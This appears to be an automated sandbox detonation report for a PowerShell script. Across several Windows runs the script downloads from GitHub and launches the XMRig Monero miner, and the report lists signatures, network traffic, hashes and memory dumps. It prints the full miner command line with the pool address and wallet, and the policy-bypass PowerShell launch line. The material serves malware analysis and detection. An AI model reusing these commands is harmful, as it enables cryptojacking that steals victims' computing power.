N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/2624-0-0x00007FFF96EB3000-0x00007FFF96EB5000-memory.dmp

memory/2624-1-0x000002052C830000-0x000002052C852000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fypeibld.mhg.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2624-10-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp

memory/2624-11-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp

memory/2624-12-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp

memory/2624-14-0x000002052CD20000-0x000002052CD32000-memory.dmp

memory/2624-15-0x000002052CAB0000-0x000002052CABA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3624-46-0x00000213A6E00000-0x00000213A6E20000-memory.dmp

memory/3624-47-0x00000213A6E50000-0x00000213A6E70000-memory.dmp

memory/3624-48-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/2624-49-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp

memory/3624-51-0x00000213A6EA0000-0x00000213A6EC0000-memory.dmp

memory/3624-50-0x00000213A6E70000-0x00000213A6E90000-memory.dmp

memory/3624-52-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/2624-53-0x00007FFF96EB3000-0x00007FFF96EB5000-memory.dmp

memory/3624-54-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-55-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-57-0x00000213A6EA0000-0x00000213A6EC0000-memory.dmp

memory/3624-56-0x00000213A6E70000-0x00000213A6E90000-memory.dmp

memory/3624-58-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-59-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-60-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-61-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-62-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-63-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-64-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-65-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-66-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-67-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-68-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-69-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-70-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-71-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-72-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-73-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-74-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-75-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-76-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-77-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-78-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-79-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-80-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-81-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-82-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-83-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-84-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-85-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-86-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-87-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-88-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-89-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-90-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-91-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-92-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-93-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-94-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-95-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-96-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-97-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-98-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-99-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-100-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-101-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-102-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-103-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-104-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-105-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-106-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-107-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-108-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-109-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-110-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-111-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-112-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-113-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-114-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-115-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-116-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:30

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1796s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp

Files

memory/4740-2-0x00007FFAB0573000-0x00007FFAB0574000-memory.dmp

memory/4740-5-0x000001966BC20000-0x000001966BC42000-memory.dmp

memory/4740-8-0x00007FFAB0570000-0x00007FFAB0F5C000-memory.dmp

memory/4740-9-0x000001966BDD0000-0x000001966BE46000-memory.dmp

memory/4740-10-0x00007FFAB0570000-0x00007FFAB0F5C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4wwxvpcu.rh0.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4740-25-0x00007FFAB0570000-0x00007FFAB0F5C000-memory.dmp

memory/4740-48-0x000001966BDB0000-0x000001966BDC2000-memory.dmp

memory/4740-61-0x000001966BDA0000-0x000001966BDAA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1996-90-0x00000157FFD50000-0x00000157FFD70000-memory.dmp

memory/1996-91-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-92-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/4740-93-0x00007FFAB0573000-0x00007FFAB0574000-memory.dmp

memory/4740-94-0x00007FFAB0570000-0x00007FFAB0F5C000-memory.dmp

memory/4740-95-0x00007FFAB0570000-0x00007FFAB0F5C000-memory.dmp

memory/1996-96-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-97-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-98-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-99-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-100-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-101-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-102-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-103-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-104-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-105-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-106-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-107-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-108-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-109-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-110-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-111-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-112-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-113-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-114-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-115-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-116-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-117-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-118-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-119-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-120-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-121-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-122-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-123-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-124-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-125-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-126-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-127-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-128-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-129-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-130-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-131-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-132-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-133-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-134-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-135-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-136-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-137-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-138-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-139-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-140-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-141-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-142-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-143-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-144-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-145-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-146-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-147-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-148-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-149-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-150-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-151-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-152-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-153-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-154-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-155-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

memory/1996-156-0x00007FF7A17E0000-0x00007FF7A2413000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:31

Platform

win7-20240220-en

Max time kernel

1559s

Max time network

1559s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Network

N/A

Files

memory/840-4-0x000007FEF5B9E000-0x000007FEF5B9F000-memory.dmp

memory/840-7-0x000007FEF58E0000-0x000007FEF627D000-memory.dmp

memory/840-6-0x00000000027E0000-0x00000000027E8000-memory.dmp

memory/840-5-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

memory/840-9-0x000007FEF58E0000-0x000007FEF627D000-memory.dmp

memory/840-8-0x000007FEF58E0000-0x000007FEF627D000-memory.dmp

memory/840-10-0x000007FEF58E0000-0x000007FEF627D000-memory.dmp

memory/840-11-0x000007FEF58E0000-0x000007FEF627D000-memory.dmp

memory/840-12-0x000007FEF58E0000-0x000007FEF627D000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:33

Platform

win11-20240426-en

Max time kernel

1798s

Max time network

1795s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

memory/3800-0-0x00007FFB24C93000-0x00007FFB24C95000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yb0neiay.uck.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3800-9-0x000002DB510C0000-0x000002DB510E2000-memory.dmp

memory/3800-10-0x00007FFB24C90000-0x00007FFB25752000-memory.dmp

memory/3800-11-0x00007FFB24C90000-0x00007FFB25752000-memory.dmp

memory/3800-12-0x00007FFB24C90000-0x00007FFB25752000-memory.dmp

memory/3800-14-0x000002DB51080000-0x000002DB51092000-memory.dmp

memory/3800-15-0x000002DB38C20000-0x000002DB38C2A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4932-46-0x0000021BCAAA0000-0x0000021BCAAC0000-memory.dmp

memory/4932-47-0x0000021BCAAF0000-0x0000021BCAB10000-memory.dmp

memory/4932-48-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/3800-49-0x00007FFB24C93000-0x00007FFB24C95000-memory.dmp

memory/4932-51-0x0000021BCAB10000-0x0000021BCAB30000-memory.dmp

memory/4932-52-0x0000021BCAB30000-0x0000021BCAB50000-memory.dmp

memory/3800-50-0x00007FFB24C90000-0x00007FFB25752000-memory.dmp

memory/4932-53-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/3800-54-0x00007FFB24C90000-0x00007FFB25752000-memory.dmp

memory/4932-55-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-56-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-58-0x0000021BCAB30000-0x0000021BCAB50000-memory.dmp

memory/4932-57-0x0000021BCAB10000-0x0000021BCAB30000-memory.dmp

memory/4932-59-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-60-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-61-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-62-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-63-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-64-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-65-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-66-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-67-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-68-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-69-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-70-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

